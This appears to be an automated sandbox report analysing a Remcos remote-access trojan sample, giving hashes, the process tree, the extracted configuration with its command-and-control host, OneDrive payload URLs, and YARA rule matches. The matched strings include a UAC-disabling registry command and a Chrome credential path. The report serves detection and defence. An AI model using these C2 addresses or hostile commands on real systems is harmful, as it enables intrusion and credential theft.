
Windows Analysis Report yVhvGnsUpL

Overview

General Information

Sample Name: yVhvGnsUpL (renamed file extension from none to exe)
Analysis ID: 487629
MD5: cf98d2d4d4555323842c8371db09347e
SHA1: 2bd28f09d3ea7c08bae3a90dd32c28335488eb43
SHA256: 8fa72e87addead9671e573d7cb843ca784a10cfbf6acf5b6bc4830df66fe0bf0
Tags: 32, exe, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionality to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch a control shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • yVhvGnsUpL.exe (PID: 1400 cmdline: 'C:\Users\user\Desktop\yVhvGnsUpL.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • DpiScaling.exe (PID: 6728 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
    • cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7032 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 7116 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Srakjle.exe (PID: 7144 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • mobsync.exe (PID: 4868 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Srakjle.exe (PID: 6164 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • mobsync.exe (PID: 6120 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\eljkarS.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
    • 0x60f17:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x600ef:$str_b2: Executing file:
    • 0x6105b:$str_b3: GetDirectListeningPort
    • 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x60adb:$str_b7: \update.vbs
    • 0x6013f:$str_b9: Downloaded file:
    • 0x6012b:$str_b10: Downloading file:
    • 0x60113:$str_b12: Failed to upload file:
    • 0x61023:$str_b13: StartForward
    • 0x61043:$str_b14: StopForward
    • 0x60a83:$str_b15: fso.DeleteFile "
    • 0x60a17:$str_b16: On Error Resume Next
    • 0x60ab3:$str_b17: fso.DeleteFolder "
    • 0x60103:$str_b18: Uploaded file:
    • 0x6017f:$str_b19: Unable to delete:
    • 0x60a4b:$str_b20: while fso.FileExists("
    • 0x605d4:$str_c0: [Firefox StoredLogins not found]

Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings: identical to the REMCOS_RAT_variants match listed above (same strings at the same offsets)

Source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

[13 further memory-dump entries are collapsed in the original report and not shown here]

Unpacked PEs

Source: 32.2.mobsync.exe.10591a73.2.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 32.2.mobsync.exe.10591a73.2.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
    • 0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5d47c:$str_b2: Executing file:
    • 0x5e3e8:$str_b3: GetDirectListeningPort
    • 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x5de68:$str_b7: \update.vbs
    • 0x5d4cc:$str_b9: Downloaded file:
    • 0x5d4b8:$str_b10: Downloading file:
    • 0x5d4a0:$str_b12: Failed to upload file:
    • 0x5e3b0:$str_b13: StartForward
    • 0x5e3d0:$str_b14: StopForward
    • 0x5de10:$str_b15: fso.DeleteFile "
    • 0x5dda4:$str_b16: On Error Resume Next
    • 0x5de40:$str_b17: fso.DeleteFolder "
    • 0x5d490:$str_b18: Uploaded file:
    • 0x5d50c:$str_b19: Unable to delete:
    • 0x5ddd8:$str_b20: while fso.FileExists("
    • 0x5d961:$str_c0: [Firefox StoredLogins not found]

Source: 12.2.DpiScaling.exe.10590000.2.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 12.2.DpiScaling.exe.10590000.2.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
    • 0x60317:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60293:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60293:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5f89b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x5fef3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5f4ef:$str_b2: Executing file:
    • 0x6045b:$str_b3: GetDirectListeningPort
    • 0x5fcb3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x5fedb:$str_b7: \update.vbs
    • 0x5f53f:$str_b9: Downloaded file:
    • 0x5f52b:$str_b10: Downloading file:
    • 0x5f513:$str_b12: Failed to upload file:
    • 0x60423:$str_b13: StartForward
    • 0x60443:$str_b14: StopForward
    • 0x5fe83:$str_b15: fso.DeleteFile "
    • 0x5fe17:$str_b16: On Error Resume Next
    • 0x5feb3:$str_b17: fso.DeleteFolder "
    • 0x5f503:$str_b18: Uploaded file:
    • 0x5f57f:$str_b19: Unable to delete:
    • 0x5fe4b:$str_b20: while fso.FileExists("
    • 0x5f9d4:$str_c0: [Firefox StoredLogins not found]

Source: 32.2.mobsync.exe.10590000.1.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

[31 further unpacked-PE entries are collapsed in the original report and not shown here]

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              AV Detection:

Found malware configuration
Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, Malware Configuration Extractor: Remcos (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: yVhvGnsUpL.exe, Virustotal: Detection: 17%
Source: yVhvGnsUpL.exe, ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match, File source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe, ReversingLabs: Detection: 13%
Source: 32.0.mobsync.exe.10590000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.DpiScaling.exe.10590000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.DpiScaling.exe.10590000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.DpiScaling.exe.10590000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.mobsync.exe.10590000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.DpiScaling.exe.10590000.2.unpack, Avira: Label: TR/Dropper.Gen
Source: 32.2.mobsync.exe.10590000.1.unpack, Avira: Label: TR/Dropper.Gen
Source: 32.0.mobsync.exe.10590000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.mobsync.exe.10590000.1.unpack, Avira: Label: TR/Dropper.Gen
Source: 32.0.mobsync.exe.10590000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.DpiScaling.exe.10590000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0042E5CA
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006FE5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_006FE5CA
Source: DpiScaling.exe, Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: yVhvGnsUpL.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_004061C3 FindFirstFileW,FindNextFileW,12_2_004061C3
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040A22D
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_004153F5
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006DA012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_006DA012
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D61C3 FindFirstFileW,FindNextFileW,28_2_006D61C3
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006DA22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_006DA22D
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006E53F5 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_006E53F5
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006E7754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,28_2_006E7754
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D77EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D77EC
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_00716AF9 FindFirstFileExA,28_2_00716AF9
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D7C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D7C55
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,28_2_006D697D

              Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: twistednerd.dvrlists.com
Source: global traffic, TCP traffic: 192.168.2.7:49745 -> 31.3.152.100:8618
Source: Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmp, String found in binary or memory: https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-e
Source: Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp, Srakjle.exe, 00000017.00000003.327780846.0000000000918000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mJP3DWIE85gNIpmObLH3hi3UpJBBLdFJk7RCXT24FMEV8lArD0Fn2UIcXDbPv6JQH
Source: yVhvGnsUpL.exe, 00000001.00000003.258050716.00000000006BA000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mNt-qRdwgdgleDGIKLTjkSpjyK1SPD4JqhzBPVsXePk0c3S_cv0HIXRKPw3hfw-mi
Source: Srakjle.exe, 00000017.00000003.327666701.0000000000908000.00000004.00000001.sdmp, Srakjle.exe, 00000018.00000003.357618476.00000000008DB000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mPMXRQ9RhgDP1jnSDjqdPjwRNYCC8VbCCQIIz4UaVns5irDBNa_yn-ZyicxZlvW-L
Source: Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mh8HSTx1Gc1J_Se9cvXUaWcrzZtNRVGZZTLbaxsKszTpDWJ-FC3XLmVZQpssvfNP6
Source: Srakjle.exe, 00000018.00000003.347807282.00000000008E2000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mohjgwISBEqynaGbNFXQ3e1iQ9fbj0U-Xdj6_ZQCNnX6wH2IF_C6xvDKVjks_iaCm
Source: Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmp, String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4myaa9OvyECoBdBcRm0EdYi3SYgM-H9eDickjezG2FcBm2P6AhF8ifoGyKxGwKMCHJ
Source: unknown, DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 12_2_00422251 recv,12_2_00422251
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D9BD9 OpenClipboard,GetClipboardData,CloseClipboard,28_2_006D9BD9
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D89BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,28_2_006D89BA
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006D9BD9 OpenClipboard,GetClipboardData,CloseClipboard,28_2_006D9BD9

              E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match, the same 30 UNPACKEDPE, MEMORY and MEMORYSTR sources listed under "Yara detected Remcos RAT" in the AV Detection section above

              Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 28_2_006E7F10 SystemParametersInfoW,28_2_006E7F10

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: yVhvGnsUpL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
